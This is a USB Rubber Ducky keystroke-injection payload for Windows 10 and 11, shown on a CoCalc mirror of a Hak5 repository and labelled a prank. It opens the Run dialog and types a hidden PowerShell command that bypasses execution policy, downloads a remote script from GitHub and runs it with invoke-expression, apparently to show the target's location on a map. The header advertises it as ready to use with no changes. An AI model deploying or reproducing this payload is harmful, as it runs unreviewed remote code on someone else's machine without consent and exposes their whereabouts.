Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/-RD-We-Found-You/payload.txt
2968 views
1
REM Title: Rage-PopUps
2
3
REM Author: I am Jakoby
4
5
REM Description: This payload is meant to open a map in your targets web browser with their current location
6
7
REM Target: Windows 10, 11
8
9
REM --------------------------------------------------------------------------------------
10
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
11
REM --------------------------------------------------------------------------------------
12
13
GUI r
14
DELAY 500
15
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-We-Found-You/found-you.ps1?dl=1; invoke-expression $pl
16
ENTER
17
18